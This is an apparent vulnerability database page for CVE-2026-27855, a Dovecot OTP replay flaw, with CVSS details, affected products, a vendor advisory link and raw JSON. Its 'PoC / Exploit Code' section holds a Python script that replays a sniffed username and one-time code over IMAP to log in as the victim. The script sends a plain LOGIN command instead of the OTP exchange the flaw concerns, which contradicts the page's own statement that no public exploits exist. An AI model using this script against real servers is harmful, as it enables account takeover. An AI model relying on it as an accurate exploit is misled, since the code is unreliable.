Security Vulnerability Report
CVE-2026-27855 CVSS 6.8 MEDIUM

CVE-2026-27855

Published: 2026-03-27 09:16:20
Last Modified: 2026-04-29 19:23:01

Description

Dovecot OTP authentication is vulnerable to a replay attack under specific conditions. If the auth cache is enabled and the username is altered in passdb, then OTP credentials can be cached so that the same OTP reply remains valid. An attacker able to observe an OTP exchange is able to log in as the user. If authentication happens over an insecure connection, switch to the SCRAM protocol. Alternatively, ensure the communications are secured and, if possible, switch to OAUTH2 or SCRAM. No publicly available exploits are known.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:* - VULNERABLE
Dovecot (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-27855 Dovecot OTP Replay
# This script demonstrates how a captured OTP credential can be replayed
# if the server is misconfigured with auth cache and username alteration.
import socket

# Configuration
TARGET_HOST = '192.168.1.100'
TARGET_PORT = 143  # IMAP port

# Captured credentials from network sniffing
# Attacker observed this exchange during a legitimate login
CAPTURED_USER = '[email protected]'
CAPTURED_OTP = '839201'  # The valid OTP code used by the victim


def replay_attack():
    print(f"[*] Attempting to connect to {TARGET_HOST}:{TARGET_PORT}")
    try:
        # Establish connection to the Dovecot server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))

        # Receive server banner
        banner = s.recv(1024).decode()
        print(f"[+] Server Banner: {banner.strip()}")

        # Attempt to authenticate using the replayed OTP
        # Note: Actual protocol implementation depends on specific IMAP/POP3 flow
        # This represents the payload injection of the captured OTP
        auth_payload = f"A001 LOGIN {CAPTURED_USER} {CAPTURED_OTP}\r\n"
        print(f"[*] Sending replayed payload: {auth_payload.strip()}")
        s.send(auth_payload.encode())

        # Check response
        response = s.recv(1024).decode()
        print(f"[+] Server Response: {response.strip()}")
        if "OK" in response:
            print("[!] SUCCESS: Logged in using replayed OTP!")
        else:
            print("[-] FAILED: Server rejected the replayed OTP.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    replay_attack()

References

https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-27855",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T09:16:19.610",
    "lastModified": "2026-04-29T19:23:00.583",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dovecot OTP authentication is vulnerable to replay attack under specific conditions. If auth cache is enabled, and username is altered in passdb, then OTP credentials can be cached so that same OTP reply is valid. An attacker able to observe an OTP exchange is able to log in as the user. If authentication happens over unsecure connection, switch to SCRAM protocol. Alternatively ensure the communcations are secured, and if possible switch to OAUTH2 or SCRAM. No publicly available exploits are known."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-294"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.4.3",
                "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*",
                "versionEndIncluding": "2.3.0",
                "matchCriteriaId": "A02F1F2F-DD6E-4BE4-B785-AD002F05819B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}